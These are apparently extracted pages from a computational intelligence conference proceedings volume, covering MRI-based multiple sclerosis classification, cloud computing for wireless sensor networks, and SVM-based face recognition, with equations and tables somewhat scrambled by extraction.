In the next step, all the images has been converted into grayscale. Contrast-limited
adaptive histogram equalization method is utilized for improvement of contrast in
training and test dataset images. Afterwards, gamma correction has been used to
control the brightness of the image.
Training Textural
Brain Feature
Images
MRI Image Extraction
(85%)
(Healthy+
Unhealthy)
Image
Preprocessing Testing Supervised and
Images Unsupervised
(15%) Classification
Performance Comparative
Analysis of Accuracy
Fig. 1 Block diagram of multiple sclerosis identification based on gray level textural feature matrix
(GLTFM) using supervised and unsupervised machine learning techniques
372 S. Jain et al.
2.3 Classification
To classify unhealthy (MS brain MRI image) from healthy (normal brain MRI image),
five different classification techniques have been used for comparing the results of
MSD identification as discussed in forthcoming section.
The minimum distance has been used to calculate the nearest neighbor of a test
brain magnetic resonance image.
SVM (Support Vector Machine). SVM is a hypothesis that analyzes data identifi-
cation patterns and then used for classification problems. The classification problem
can be restricted to examination of the two-class problem. For each given input, the
Supervised and Unsupervised Machine Learning Techniques … 373
Table 1 Eighteen gray level textural features of brain magnetic resonance image
Entropy (ENT) = It is mathematical changeability that describes the
− i, j x(i, j) log(x(i, j) texture of image
Energy (ENE) = x(i, j)2 It is the rate of change in the magnitude of the pixels
value over nearby areas
x(i, j)
Homogeneity (HOM) = i, j 1+(i− j)2 It measured the proximity of the distribution of
elements in the matrix to the diagonal element
Contrast (CONT) = It gives gray level contrast between a pixel and its
neighboring pixel value over the entire image
i, j |i − j| x(i, j)
2
Sum of square Variance (SSV) = It computes the dissipation with respect to the mean of
gray level distribution
i, j (i − μ) x(i, j)
2
Maximum probability (MAXPROB) = It shows the appearance of the gray level value xi
max x(i, j) adjacent to the gray level value xj more supreme in the
image
Autocorrelation (AUTOCORR) = It is described as a closeness measure between dataset
and shifted copy of dataset
i j i. j.x(i, j)
(continued)
374 S. Jain et al.
Table 1 (continued)
Entropy (ENT) = It is mathematical changeability that describes the
− i, j x(i, j) log(x(i, j) texture of image
Dissimilarity (DISS) = It is variation of gray level pairs
i j |i. − j|.x(i, j)
w T (M(x0 )) + b
d H (M(x0 )) = (3)
w2
The product of a predicted and actual label is greater than zero on correct predic-
tion, otherwise less than zero. The kernel function takes data as input and changes
it into the desirable form. Three kernel functions (radial basis function, linear and
polynomial) were utilized to find the best accuracy rate of 96.55% with a polynomial
kernel function.
Ensemble Learning. Ensemble learning is the technique that combines different
classifiers having some error rate and to get a resulting approach in which the error
rate is small. In this proposed work, decision tree with four different boosting and
bagging algorithms (AdaboostM1, LPBoost, logitBoost, RUSBoost and Bagging)
has been implemented to do the binary classification task that separates the healthy
brain from the unhealthy brain (multiple sclerosis) MR classes. In decision tree, a
large number of trees are built and each tree chooses a class, and the class which
receives the most votes by a simple majority is the predicted class. The label 0,
1 denotes normal as well as abnormal classes. Then, it gave a signal to learning
algorithm n number of times, and in all rounds, a training weight is allocated to
each training sample. At the start of the algorithm, all the weights for each training
example were the same, and in the subsequent rounds, the weight of incorrectly
Supervised and Unsupervised Machine Learning Techniques … 375
classified objects has been enhanced to target on tough objects in the training set.
Lastly, a strong approach is constructed. Decision tree with LPboost gives the highest
accuracy rate of 82.75%.
p
disti j = |m i − n i | (5)
i=1
When all the feature groups are incorporated in some clusters, the first step
is completed, and an early grouping is done reevaluating the average of the first
formed clusters. This recursive process continues until the criterion function becomes
minimum.
Gaussian Mixture Model. GMM is also an unsupervised algorithm for classifi-
cation of healthy brain MR image from non-healthy MR image. It is a probabilistic
model that uses smooth clustering technique for spreading the feature points into
different clusters. For a set of data location, GMM would identify the likelihood of
each data point that belongs to each of these distributions. Expectation-maximization
is the base of GMM. Let μ1 μ2 are the mean, σ1 σ2 are the covariance values of cluster
1 and cluster 2, respectively. The density of the distribution is ρi . First random assign-
ment to these values has been done, and after that, to find the values of the parame-
ters for defining the Gaussian distribution, expectation-maximization step has been
performed.
E Step—For each data point xi , calculate the probability that it belongs to
cluster/distribution c1 , c2 . This is done using the formula in Eq. (6)
The value will be high if point is assigned to right cluster; otherwise, it is low.
M Step—Updation of μ, σ and ρ will be done. These are updated using Eq. (7–9)
as mentioned below.
No. of points assigned to the cluster
ρ= (7)
Total number of points
376 S. Jain et al.
The mean and the covariance matrix are updated based on the assigned values to
the distribution, in proportion with the probability values for the data point.
i ric ∗ x i
μ= (8)
No. of points assigned to the cluster
i ric (x i − μc ) (x i − μc )
T
σc = (9)
No. of points assigned to the cluster
3 Experimental Results
In this section, accuracy is analyzed on different kernel scales and three kernel func-
tions (radial basis function, linear and polynomial). It has been analyzed from Table
4 that the heuristic approach of kernel scale selection gives the best results. The
polynomial kernel gives the highest accuracy (96.55%) as compared to radial basis
function (48.27%) and linear kernel function (93.1%) with a heuristic approach for
identification of the kernel scale as illustrated in Table 4.
In this, accuracy is analyzed on different learning cycles with four different boosting
methods (AdaboostM1, Logitboost, LPboost and RUSboost) and bagging method.
It has been analyzed that Adaboost and logitBoost will give the highest accuracy
(82.75%) with 300 and 500 learning cycles, respectively (Table 5).
Table 6 Performance of
Classification model Accuracy (%)
unsupervised techniques
K-mean clustering 75.86
Gaussian mixture model 72.41
Fig. 2 Accuracy of
K-nearest neighbor on
different distance measures
Fig. 4 Accuracy of
ensemble on different
learning cycles
4 Conclusion
consisting of 110 healthy control brain MRI images from private clinical dataset and
82 unhealthy (multiple sclerosis) brain MRI images from e-health dataset. Eighteen
textural features have been extracted after preprocessing of brain magnetic reso-
nance images. It has been verified that supervised learning approach outperforms
unsupervised approach. The K-nearest neighbor classifier and polynomial kernel-
based support vector machine (SVM) give highest accuracy of 96.55% as compared
to unsupervised approach. In future work, different feature extraction techniques
will be analyzed on different classification models, and also comparative study with
convolution neural network will be analyzed for the identification task of multiple
sclerosis disease from brain magnetic resonance images.
References
1. Zhou, Q., & Shen, X. (2018). Multiple sclerosis identification by grey-level cooccurrence
matrix and biogeography-based optimization. In 2018 IEEE 23rd International Conference on
Digital Signal Processing (DSP), Shanghai, China (pp. 1–5). https://doi.org/10.1109/ICDSP.
2018.8631873
2. Nayak, D. R., Dash, R., & Majhi, B. (2016). Brain MR image classification using two-
dimensional discrete wavelet transform and AdaBoost with random forests. Neurocomputing,
177, 188–197. ISSN 0925-2312, https://doi.org/10.1016/j.neucom.2015.11.034
3. Wu, X., Lopez, M. (209). Multiple sclerosis slice identification by haar wavelet transform and
logistic regression. In Advances in materials, machinery, electrical engineering (AMMEE 209).
Atlantis Press. https://doi.org/10.2991/ammee-17.2017.10
4. Wang, S.-H., Cheng, H., Phillips, P., & Zhang, Y.-D. (2018). Multiple sclerosis identification
based on fractional fourier entropy and a modified Jaya algorithm. Entropy, 20, 254. https://
doi.org/10.3390/e20040254
Supervised and Unsupervised Machine Learning Techniques … 381
5. Wang, S., et al. (2016). Multiple sclerosis detection based on biorthogonal wavelet transform,
RBF kernel principal component analysis, and logistic regression. IEEE Access, 4, 7567–7576.
https://doi.org/10.1109/ACCESS.2016.2620996
6. Zhang, Y. -D., et al. (2018). Multiple sclerosis identification by convolutional neural network
with dropout and parametric ReLU. Journal of Computational Science, 28, 1–10. https://doi.
org/10.1016/j.jocs.2018.07.003
7. Zurita, M., Montalba, C., Labbé, T., Cruz, J. P., da Rocha, J. D., Tejos, C., Ciampi, E.,
Cárcamo, C., Sitaram, R., Uribe, S. (2018). Characterization of relapsing-remitting multiple
sclerosis patients using support vector machine classifications of functional and diffusion MRI
data. NeuroImage: Clinical, 20, 724–730. ISSN 2213-1582, https://doi.org/10.1016/j.nicl.2018.
09.002
8. Valcarcel, A. M. et al. (2020). TAPAS: A thresholding approach for probability map automatic
segmentation in multiple sclerosis. NeuroImage. Clinical 27, 102256. https://doi.org/10.1016/
j.nicl.2020.102256
9. Roy, S., et al. (2017). An effective method for computerized prediction and segmentation of
multiple sclerosis lesions in brain MRI. Computer Methods and Programs in Biomedicine, 140,
307–320. https://doi.org/10.1016/j.cmpb.2017.01.003
10. Shanmuganathan, M., et al. (2020). Review of advanced computational approaches on multiple
sclerosis segmentation and classification. IET Signal Processing, 14(6), 333–341. https://doi.
org/10.1049/iet-spr.2019.0543
11. e-health dataset. http://www.medinfo.cs.ucy.ac.cy/
12. Loizou, C. P., Murray, V., Pattichis, M. S., Seimenis, I., Pantziaris, M., & Pattichis, C. S.
(2011). Multi-scale amplitude modulation-frequency modulation (AM-FM) texture analysis
of multiple sclerosis in brain MRI images. IEEE Transactions on Information Technology in
Biomedicine, 15(1), 119–129.
13. Loizou, C. P., Kyriacou, E. C., Seimenis, I., Pantziaris, M., Petroudi, S., Karaolis, M., &
Pattichis, C. S. (2013). Brain white matter lesion classification in multiple sclerosis subjects
for the prognosis of future disability. Intelligent Decision Technologies Journal (IDT), 7, 3–10.
14. Loizou, C. P., Pantziaris, M., Pattichis, C. S., & Seimenis, I. (2013). Brain MRI image
normalization in texture analysis of multiple sclerosis. Journal of Biomedical Graphics and
Computing, 3(1), 20–34.
15. Loizou, C. P., Petroudi, S., Seimenis, I., Pantziaris, M., & Pattichis, C. S. (2015). Quanti-
tative texture analysis of brain white matter lesions derived from T2-weighted MR images
in MS patients with clinically isolated syndrome. Journal of Neuroradiology. Journal de
Neuroradiologie, 42(2), 99–114. https://doi.org/10.1016/j.neurad.2014.05.006(2014)
16. All the healthy brain magnetic resonance image is from radiology department of Safdarjang
Hospital, New Delhi and Subharti Medical College, Meerut.
17. Jyotsna, N. R., & Vishwakarma, V. P. (2016). Face recognition using Symlet, PCA and cosine
angle distance measure. In 2016 Ninth International Conference on Contemporary Computing
(IC3), Noida (pp. 1–7). https://doi.org/10.1109/IC3.2016.7880231.
18. Eshaghi, A., Wottschel, V., Cortese, R., Calabrese, M., Sahraian, M. A., Thompson, A. J.,
Alexander, D. C., & Ciccarelli, O. (2016). Gray matter MRI differentiates neuromyelitis optica
from multiple sclerosis using random forest. Neurology, 87(23), 2463–2470. https://doi.org/
10.1212/WNL.0000000000003395
19. Jain, S., Rajpal, N., & Yadav, J. (2020) Multiple sclerosis identification based on ensemble
machine learning technique (November 21, 2020). In Proceedings of the 2nd International
Conference on IoT, Social, Mobile, Analytics and Cloud in Computational Vision and Bio-
Engineering (ISMAC-CVB 2020). Available at SSRN https://ssrn.com/abstract=3734806 or
https://doi.org/10.2139/ssrn.3734806
Cloud Computing Overview of Wireless
Sensor Network (WSN)
Abstract Wireless sensor networks (WSNs) are spatially scattered systems outfitted
with an enormous number of hubs for checking and recording different ecological
conditions like stickiness, temperature, pressure, and thus, helping various condi-
tions and so forth. In this paper, we have started with introducing the WSN and
cloud computing. Next, we have discussed the overview, features, services provided
by cloud computing. Then, we have discussed overview of WSN. Then, we have
discussed application scenarios of cloud computing and WSN. Afterwards, we
concluded the paper.
1 Introduction
Correspondence between sensor hubs that use the internet is often a difficult question.
It bodes well to incorporate sensor systems with Internet [1–12]. Simultaneously,
the information of sensor system ought to be accessible at any time through any
way [1]. Allocating addresses to sensor hubs of enormous numbers is perhaps a
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 383
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_31
384 M. P. Nath et al.
challenging problem. So sensor hub cannot build up association with the network
alone. Distributed processing system also helps the corporate relationship with not so
much problem to lead its middle corporate practices but rather with more conspicuous
profitability. The use of a cloud-like climate can be regulated even more successfully
by countless virtual servers and apps [2].
Figure 1 comprises of WSNs (e.g., WSN1, WSN2 and WSN3), clients and
cloud foundation. Customers are looking for administration in the framework. WSN
consists of physical remote sensor hubs designed to detect various applications,
such as: transport surveillance, climate anticipating, and military usage and so on.
Every sensor hub is modified with the necessary application. Sensor hub addition-
ally comprises of working framework parts and system along with the executive
segments. Application program distinguishes the application on every sensor hub
and authentically sends back to cloud entry via access point or cross-skip via various
center points. Steering convention assumes a fundamental job in dealing with the
system topology and to suit the system elements. Cloud gives on-request adminis-
tration and capacity assets to the customers. It gives access to these assets through
web and proves to be useful when there is an abrupt necessity of assets [3].
Cloud Computing Overview of Wireless Sensor Network (WSN) 385
Cloud computing is a referent that being used to depict both a stage and kind of
utilization. Distributed registering stages with intensive courses of action, structures
and reconfigured servers that are being changed are the vital factors. Cloud servers
can be virtual machines or physical machines. In contrast to having nearby servers to
handle applications, this is an option. As a consequence, the distributed computing
system’s end clients do not have any idea where the servers actually are. Clouds
computing customarily join other enlisting resources, for instance, accumulating
locale frameworks, arranging apparatus, “firewall” and other “security contraptions”
[4]. In addition, distributed computing depicts applications that are loosened up to be
open over the web. Such cloud applications use massive server crops and incredible
server hosting “web application” [5] and “Data administrations” [6]. Anyone with a
sensible affiliation to the web and a standard procedure can get to cloud apps.
organizations and applications (for instance SaaS) on the PaaS cloud. The qual-
ification between SaaS and PaaS is therefore that SaaS has simply completed
cloud applications, while PaaS gives a propelled stage that hosts completed cloud
applications similarly to in-progress. This implements PaaS to provide a basis
for change including the programming situation, programming, arrangement, etc.
Google App Engine is one such case of PaaS [9].
• Infrastructure as a Service (IaaS): Cloud buyers directly use IT structures given
in the IaaS cloud (taking care of, storing, frameworks and other focus figuring
resources). In the IaaS cloud, virtualization is used extensively to organize material
assets in a unique way to satisfy rising or diminishing requests for organizations
from cloud buyers. The principal virtualization method is to set up discrete virtual
machines (VMs), disconnected from both the fundamental gear and diverse VMs.
This strategy is not exactly equivalent to the multi-inhabitance model, which
hopes to change the item establishment of the application to such a degree, that
various cases (from different cloud buyers) can chip away at a single application.
One example of an IaaS is EC2 from Amazon [9].
• Software as a Service (SaaS): Cloud buyers release their applications in an
encouraging space that customers of the application can get to by methods for
frameworks from different clients. Examples are Internet browser, “PDA” [2],
and so on. Cloud users have no leverage over the often-used cloud structure that
uses multi-inhabitant system plan, specifically that assorted cloud clients’ appli-
cations to be consolidated in the SaaS cloud in a single keen condition to achieve
economies of scale and viability with respect to speed, protection, openness,
disaster recovery and backing. SaaS models join Google Mail, Google Docs, etc.
• Data as a Service (DaaS): DaaS can be used as an exceptional IaaS grouping.
DaaS allows purchasers to pay for what they really use for the whole database,
instead of the site permit. Despite standard limit interfaces, for instance, RDBMS
and record structures, some DaaS executions fuse table-style considerations that
are expected to scale out to store and recuperate monstrous measures of data. Such
kinds of DaaS include: “Amazon S3,” “Google BigTable,” “Apache Hbase” [3],
etc.
WSN routing conventions are generally divided into two classes: “network-based
structure” and “protocol-based service”. System structure-based controlling are
again separated into level-based planning, distinctive leveled based organizing and
region-based coordinating. Conventional operations are again isolated into “Multi-
path based,” “Query based,” “QoS based,” “Coherent based” and “Negotiation based”
[3]. In area-based routing, positions of the sensor hubs are misused to provide infor-
mation on the system. In this kind of coordination, sensor center points are tended to
by strategies for their regions. The partition between neighboring center points can
be evaluated depending on moving towards sign characteristics.
Relative bearing of neighboring center points can be obtained through the sharing
of this information among peers [3]. Of course, the district of focuses might be open
truly by chatting with a satellite, utilizing “GPS (Global Positioning System)” [5].
The instances of area-based directing conventions are: “GAF,” “GEAR,” “GPSR,”
“MFR,” “DIR,” “GEDIR,” “GOAFR,” “SPAN” [5] and so forth. In hierarchical-based
routing, hubs will assume various jobs in the system. An alternate leveled structuring
can be utilized to process and send the data while low objectives and places can be
utilized to play out the recognition in the closeness of the objective. This suggests
making of packs and assigning one-of-kind tasks to gather heads that can hugely add
to all things considering system adaptability, lifetime and cooperativeness adequacy.
Cloud Computing Overview of Wireless Sensor Network (WSN) 389
Joining WSNs with the cloud simplifies the on-the-fly sharing and dissecting of
ongoing sensor knowledge. It also gives a favorable role as assistance over the web
to offer sensor information. The words “Software as a Service (SaaS)” [3] and “Sensor
Event as a Service (SEaaS)” [5] are authored to represent how sensor information
and interest opportunities can be accessed separately over the cloud foundation to
the customers. Converging two advances bodes well for huge utilization numbers.
Some uses of sensor arrangement using distributed computation are as follows.
Anticipating climate is the application to predict the air conditioning for a future time
and for a provided area. Climate checking and determining framework normally
incorporate: data assortment, data absorption, numerical climate expectation and
forecast introduction. To detect the accompanying parameters, each climate station
is equipped with sensors, viz., wind speed/bearing, relative stickiness, temperature,
barometric pressure, precipitation, soil dampness, surrounding light (impercepti-
bility) and sky spread. The data gathered from these sensors are tremendous in size
and use of the conventional database. Absorption process is finished in the wake
of collecting the information. The confounded conditions that prescribe how the
environmental situation changes over time (climate figure) expect supercomputers
to tackle them [3].
In the military, sensor systems are used to “monitor neighboring powers” [1], “battle-
field observation” [3], battle harm appraisal, nuclear, natural and substance assault
recognition, etc. [5]. The information gathered from such applications is of most
noteworthy importance and high-level security requirements that may not be given
for security reasons by using typical web networks. Distributed computing may be
some of the answers toward this problem by providing only military application with
a stable platform that will be used for only defense intent.
5 Conclusion
The sharing of information between sensor nodes via the Internet is a hectic chal-
lenge owing to limited bandwidth, memory and small battery sizes of sensor nodes.
A widely used cloud computing technique can overcome the storage capacity issues.
Some issues pertaining to cloud computing and sensor networking are discussed in
this paper. The specific application-oriented scenarios are important for the devel-
opment of a new protocol in the sensor network. Keeping this in mind, some cloud
computing application of the sensor networks has been discussed.
References
1. Wang, Y., Jin, Q., & Ma, J. (2013). Integration of rangebased and range-free localiza-
tion algorithms in wireless sensor networks for mobile clouds. In Green Computing and
Communications(Greencom.).
Cloud Computing Overview of Wireless Sensor Network (WSN) 391
Abstract With the advances in technology, facial recognition has become a very
popular technology to be used majorly as a security technique. Face recognition using
support vector machine is being used since years but it does not work well with imbal-
anced data and computational time which is more. In this work, an enhanced support
vector machine (ESVM) is utilized for multi-classifying the face images. Fisher space
method is utilized for feature extraction as it is more efficient for dataset consisting
of multiple classes with class separability as a vital attribute while compressing
dimensionality. It concentrates on type of features from face image data that provide
a better demarcation for separation of face images, and then, ESVM-based multi-
classification is utilized for classification purpose. The advantage of ESVM-based
multiclass classification for face images includes flexibility, enhanced computational
time. ESVM-based multiclass classification based on One-vs-One (OVO) and One-
vs-All (OVA) which is utilized for performing experiment on two standard databases
such as Yale and ORL. A number of experiments are also performed varying sub-
dimensions in fisher space with different kernels of proposed ESVM on different
training sets of both databases. A remarkable recognition rate of 100 and 92.5% was
achieved on Yale and ORL database, respectively.
1 Introduction
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 393
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_32
394 T. Jain and J. Yadav
extensively used in mobile handsets nowadays [2]. This new and reliable technique is
also making headways in other critical industries including defence, banking, home
security, etc. Due to these attributes, researchers are continuously working towards
making this novel technology more robust and fool proof.
In pattern recognition, face recognition is the most widely researched topic.
It involves one to many comparisons of a probe face image against all gallery
face images. It consists of three steps majorly divided into—pre-processing (face
detection, normalization), feature extraction (dimensionality reduction) and feature
matching (authentication/recognition) [3, 4]. The extracted features are compared
with the input image and the database.
The input for the face recognition system can be a static image or dynamic image
(image captured by video). This work focuses on the static images for face recog-
nition. To achieve this, a combination of fisher subspace technique and enhanced
support vector machine is used. Other approaches proposed previously are by Turk
and Pentland [5], the concept of Eigenfaces was proposed, and this technique
was unsupervised method. Belhumeour et al. recommended fisher faces [6], which
was a supervised technique. The performance of identification improved with this
procedure.
Zhang et al., Maria et al., used Gabor wavelet Transform (GWT), stating this
method which has improved recognition rate, but its memory requirement, compu-
tation and the feature dimensions were very high [7, 8]. For illumination invariant
face recognition, an approach was proposed based on GWT, and then, K-nearest
neighbour was applied for classification [9]. Jyotsna et al. recommended a different
methodology for face recognition using principal component analysis, symlet and
cosine angle distance to improve the recognition rate on AT&T database [10].
The key challenges for positive face detection and recognition systems are illumi-
nation conditions, background, occlusion, pose, expressions, etc. Numerous algo-
rithms and approaches have been put forward to address these issues. For pose
invariant facial recognition, Xi Yin et al. suggested a convolutional neural network-
based methodology [11]. For illumination invariant facial recognition, a normaliza-
tion framework using reflectance ratio and homomorphic filtering was proposed [12].
An approach was proposed for expression invariant face recognition that used PCA,
Gabor filter and support vector machine [13], and also the system could identify
various expressions as angry, sad, etc. For feature extraction under various illumina-
tion conditions, an approach using reflectance ratio and histogram equalization was
proposed [14].
In this work, a variant of support vector machine is developed, named as enhanced
support vector machine (ESVM). With an improvement in computational time,
ESVM outperforms the traditional SVM. For classification, both techniques are used,
one-vs-one and one-vs-all. This work contributes in the following manner:
• Fisher subspace method is used for feature extraction and dimensionality reduc-
tion. The main goal of this technique is to maximize inter-class distance and
minimize distance within the class.
An Enhanced Support Vector Machine for Face Recognition … 395
• ESVM is proposed for classification of input images. This method allows a data
point on the other side of hyper plane than the group in which it falls by adding
an erroneous quantityξ.
• Experimental results are presented on YALE and ORL database, and outstanding
results are achieved, even though no pre-processing technique was applied. Even
better results can be achieved if pre-processing techniques are applied.
This paper is structured as follows: The idea of the proposed methodology is
explained in Sect. 2. Section 3 elaborates on experimental results on Yale and ORL
face image databases to demonstrate the effect of varying sub-dimensions with
varying number of training sets using the proposed methodology. Also, comparison
with existing approaches is shown. The conclusion is conferred in Sect. 5.
2 Proposed Methodology
The proposed approach takes as an input the face database and then divides the
input set into training images and test images as illustrated in Fig. 1. Results are
evaluated by varying sub-dimensions with different kernels on different number of
training sets. Fisher subspace method [15] is used for feature extraction producing
reduced dimensionality data which is fed into next stage, namely classification. For
classification, an enhanced support vector machine (ESVM) is developed, and also
for multiclass classification, two techniques are applied one-vs-one (OVO) and one-
vs-all (OVA). At the last stage of proposed methodology, i.e. model evaluation stage,
recognition accuracy and computational time is calculated for unknown face images.
Using fisher subspace method, the test images are reduced into same dimension as
training image. Then, the reduced image is classified into one of the class labels.
making within-class distance smaller after data sets are projected and makes inter-
class distance larger. This method does not work on finding the principal components;
it basically finds type of features or subspace which gives more discrimination to
separate the data. The goal of fisher subspace method is to project a n-dimension
image onto a smaller subspace s where s ≤ n − 1 [16].
Suppose, there are training face images as {x 1 , x 2 , …, x n } which belong to total
number of C classes, X 1 , X 2 , …, X C . The steps to calculate fisher projections for
images are as follows [17]:
1. Calculate the within-class distance matrix (Sw )
S w calculates the degree of scatter among items in the same class. It is calculated as
the summation of covariance of each class as given in Eq. (3).
Covariance of each class as shown in Eq. (1),
Si = (xn − μi )(xn − μi )T (1)
n ∈Ci
Sw = Si (3)
n ∈Ci
C
Sb = Ni (μ i − m t )(μ i − m t )T (4)
i=1
k
where mt is the global mean of all the images (k), m t = 1
k
xn .
n=1
Similar to PCA, eigenvectors having largest eigenvalues are used to calculate this.
Fisher criterion function when w is projection vector as expressed in Eq. (5),
T
|Sb | w Sb w
J (w) = = (5)
|Sw | w T Sw w
An Enhanced Support Vector Machine for Face Recognition … 397
The goal is to maximize J(w), and the optimal fisher basis projection matrix can
be obtained as given in Eq. (6),
T
w Sb w
w = arg max T (6)
w Sw w
Sw−1 Sb w = λw (7)
All the original images are projected onto fisher basis projection matrix by computing
dot product of image matrices with each of fisher basis projection vector as expressed
in Eq. (8).
y = wT X (8)
ESVM stands for enhanced support vector machine [18]. It is a variant of support
vector machine (SVM). The word enhanced signifies the flexibility; it provides to the
otherwise strict SVM. It suggests inclusion of approximate planes (and not strictly
bounding planes) around which the points of each category are grouped as illustrated
in Fig. 2.
It is extremely fast and reduces computational time for large data sets. ESVM
classifies linearly or nonlinearly separable data points by categorizing them to nearest
of two parallel planes which are to be pushed apart as far as possible (by the term
w T w + γ 2 ). SVM does not perform well when the target classes are overlapping. In
such cases, ESVM performs better than SVM. ESVM can solve the given problem
using linear equations as compared to quad programming used in SVM. From the
computational aspect, ESVM is better than SVM as observed in Sect. 3.
Equation of two hyper planes around which the point of each class are clustered
are, c x T w − γ = ±1 and x T w − γ = −1 respectively. If a point in a class which
does not fall on the hyper plane, x T w − γ = −1 and does not satisfy equation, a
quantity ξ is added on left-hand side x T w − γ + ξ = −1. ξ represents eccentricity
398 T. Jain and J. Yadav
of the data point from the plane passing through that particular class to which that
point belongs.
The learning problem of ESVM is expressed in Eq. (9):
C T 1 T
min ξ ξ+ w w + γ2 (9)
(w,γ ) 2 2
subject to
D(Aw − eγ ) + ξ = e (10)
where
e is a matrix of 1’s with dimension as (number of data points (m) × 1).
d is a vector of target value.
D = diagonal (d), target value of ith data, it takes +1 or −1 value.
A represents vector of data points in input space.
To enhance the performance of ESVM, any kernel can be applied on data samples,
A matrix. For our experiment purpose, three kernels are used (i) to create a linear
classifier using ESVM, a linear kernel function is applied: k x j , xk = x Tj xk , (ii) to
create a nonlinear
classifierz using ESVM, a polynomial kernel function is applied:
k x j , xk = x j xk + 1 , where z is the order of polynomial and (iii) a Gaussian
T
function is applied as: k x j , xk = exp −γ x j − xk2 .
H is computed by Eq. (11),
H = D ∗ [A − e] (11)
An Enhanced Support Vector Machine for Face Recognition … 399
u = C ∗r ∗e (13)
Now, w and γ can easily be computed using Eqs. (14) and (15)
w = AT ∗ D ∗ u (14)
γ = − eT ∗ D ∗ u (15)
For multiclass classification, two types of classification are used, namely OVO and
OVA. The OVA scheme breaks up a multiclass classification into one binary classifi-
cation problem per class, whereas the OVO strategy divides a multiclass classification
into one binary classification problem per each pair of classes.
3 Experimental Results
To assess the proposed system’s performance, tests were performed on Yale database
which consists of images in GIF format. There were 15 subjects and 11 images
per individual. Size of each image was 152 × 126 pixels. The proposed algorithm
was implemented in MATLAB 2019. Experiments were performed on a machine
with Intel i5 core, 2 GHz CPU and 8 GB RAM. Figure 3(a) shows few sample
images with different expression (such as happy, normal, surprised and sad), pose
and illumination.
ORL database consists of images of size 112 × 92. Images of total 40 individuals were
there with 10 images per individual in GIF format. These images were captured with
varied facial expressions and changing illumination. The images are a combination
of frontal view with minor left-right rotation (Fig. 3(b)).
400 T. Jain and J. Yadav
Fig. 3 a Illustration of Yale face database for a subject, b illustration of ORL face database for a
subject
Three sets of experiments are performed as follows: (i) during feature extraction,
selection of sub-dimensions for different number of training images, (ii) ESVM is
applied for multiclass classification. OVO and OVA are applied on both the databases
and (iii) different kernels had different effect on the performance of machine learning
algorithms. Tests are performed using linear kernel, polynomial kernel of order 2 and
Gaussian kernel.
To determine the minimum number of sub-dimensions required that account for most
of the variation in data, tests are performed with varying sub-dimensions on varying
number of training sets as illustrated in Tables 1 and 2 for Yale and ORL database,
respectively. In order to train the model, three images of every subject are chosen, and
the rest 8 images per subject are used for recognition in Yale database. Similarly, for
ORL database, in order to train the model, three images per subject are chosen, and
the rest 7 images per individual are used for recognition. Different sets of training
Table 1 Result on Yale database when proposed ESVM system is applied with varying sub-
dimensions with linear kernel and OVA classification on different training sets
Training Number of sub-dimensions
images per 30 40 50 60
individual
Acc (%) t i (s) Acc t i (s) Acc t i (s) Acc t i (s)
(%) (%) (%)
4 83.81 0.177 88.57 0.193 85.71 0.18 82.86 0.172
5 80 0.206 87.78 0.17 86.67 0.179 84.44 0.17
6 89.33 0.181 94.67 0.181 96 0.171 96 0.182
7 90 0.316 93.33 0.166 95 0.16 96.67 0.17
8 88.89 0.24 95.56 0.175 95.56 0.192 95.56 0.178
9 96.67 0.176 100 0.171 100 0.172 100 0.174
An Enhanced Support Vector Machine for Face Recognition … 401
Table 2 Result on ORL database when proposed ESVM system is applied with varying sub-
dimensions with linear kernel and OVA classification on different training sets
Training Number of sub-dimensions
images per 30 40 50 60
individual
Acc (%) t i (s) Acc t i (s) Acc t i (s) Acc t i (s)
(%) (%) (%)
4 75.83 0.253 77.92 0.258 80 0.266 81.25 0.273
5 74.5 0.304 79.5 0.288 84.5 0.371 86 0.302
6 78.75 0.348 80.63 0.355 84.38 0.362 85 0.358
7 79.17 0.396 81.67 0.417 86.67 0.407 86.67 0.416
8 81.25 0.463 83.75 0.479 86.25 0.48 87.5 0.496
9 87.5 0.607 92.5 0.531 90 0.584 87.5 0.568
images considered are 4, 5, 6, 7, 8 and 9 per individual, respectively, for both the
databases.
The acceptable level of variance depends on the application. For descriptive
purposes, there can be a requirement of 80% of the variance, whereas to perform anal-
yses of the data, at least 90% of variance may be required. Out of total sub-dimensions,
maximum recognition accuracy (Acc) of 100% was achieved in Yale database at
number of sub-dimensions as 40 and 9 training images per individual. Similarly, in
ORL database also, maximum recognition accuracy of 92.5% was achieved at number
of sub-dimensions as 40. So, number of sub-dimensions considered for following
tests will be 40. Also, this means computational time can be reduced keeping the
same performance of the proposed model. The outcomes are shown in Fig. 4.
As shown in Fig. 5, the computational time of ESVM is very less than SVM.
To compute recognition accuracy using proposed methodology with training images
as 5 and sub-dimension as 40, time taken is 0.17 s, whereas with same dimensions
time taken using SVM is 2.91 s. So, the proposed methodology helps in reduction
of computational time.
After fisher subspace phase using the chosen number of sub-dimension, data set is
passed to ESVM phase where two categories of classifiers are used, namely OVO
and OVA.
First, the results using ESVM and OVO are utilized on Yale database with different
number of training images per subject. To improve the recognition rate in ESVM
system, a linear kernel with OVA classification is recommended. Table 3 showcases
the performance of this method on Yale database when different number of training
images was tested. There was a significant improvement in accuracy in this system,
and also it worked faster. This is illustrated in Fig. 6. The recognition accuracy
with OVO classification was found to be 90% while training with 9 images per
individual, and for similar training images, an accuracy of 100% was achieved with
OVA classification.
Table 3 Result on Yale database when proposed ESVM system is applied with varying training
images with linear kernel and OVO and OVA classification on different training sets
Training set OVA OVO
Acc (%) t i (s) Acc (%) t i (s)
4 80.2 0.17 78.2 0.301
5 80 0.177 73.33 0.307
6 97.33 0.172 94.67 0.214
7 96.67 0.175 78.33 0.204
8 97.78 0.174 86.67 0.198
9 100 0.175 90 0.203
An Enhanced Support Vector Machine for Face Recognition … 403
Fig. 6 Accuracy of proposed system on a Yale and b ORL database by applying OVO and OVA
at different number of training images
Table 4 Result on ORL database when proposed ESVM system was applied with varying training
images with linear kernel and OVO and OVA classification on different training sets
Training set Acc (%) t i (s)
Acc (%) t i (s) Acc (%) t i (s)
4 77.92 0.258 51.25 0.711
5 79.5 0.288 55.5 0.672
6 80.63 0.355 45.63 0.665
7 81.67 0.417 46.67 0.61
